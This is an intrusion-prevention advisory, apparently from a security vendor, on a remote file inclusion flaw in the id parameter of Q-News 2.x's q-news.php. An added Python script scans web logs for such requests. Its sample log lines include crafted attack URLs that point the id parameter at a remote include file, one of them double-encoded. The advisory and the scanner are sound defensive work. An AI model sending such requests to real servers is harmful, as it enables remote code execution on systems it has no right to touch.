Intrusion Prevention

QNews.id.File.Inclusion

Description

This indicates a possible exploit of file inclusion vulnerabilities in the Q-News PHP script that may allow an attacker to execute arbitrary PHP code on the vulnerable system. The issue is due to the q-news.php script's failure to properly validate user-supplied input in the id parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Affected Products

Q-News 2.x

Impact

Compromise of the affected system.

Recommended Actions

Upgrade to a version later than Q-News 2.x or apply the appropriate patch.
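
To check whether a server has already received requests of the kind described above, web access logs can be reviewed for q-news.php requests whose id parameter carries a URL. The following is an added example, not part of the original advisory or the vendor's signature. The combined log format, the sample hostnames and addresses, and the rule "any URL scheme inside the id value" are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside an Apache/nginx "combined" log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumed indicator: any URL scheme (http://, ftp://, ...) inside the id value.
SCHEME = re.compile(r'[a-z][a-z0-9+.\-]*://', re.I)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding; bounded so crafted input cannot loop."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_id(target):
    """Return the decoded id value if a q-news.php request carries a URL in id."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith('/q-news.php'):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == 'id':
            value = fully_decode(value)
            if SCHEME.search(value):
                return value
    return None

def scan(lines):
    """Return (line_number, decoded id) for every matching log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        value = suspicious_id(m.group(1)) if m else None
        if value is not None:
            hits.append((n, value))
    return hits

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /news/q-news.php?id=12 HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /news/q-news.php?id=http://remote.example/inc.txt HTTP/1.1" 200 90 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /news/q-news.php?id=http%253A%252F%252Fremote.example%252Finc.txt HTTP/1.1" 200 90 "-" "-"',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?id=http://remote.example/a HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == '__main__':
    for n, value in scan(SAMPLE_LOG):
        print(f'line {n}: id={value}')
```

A hit shows only that such a request was received; whether the include succeeded depends on the installed Q-News version and the PHP configuration of the host.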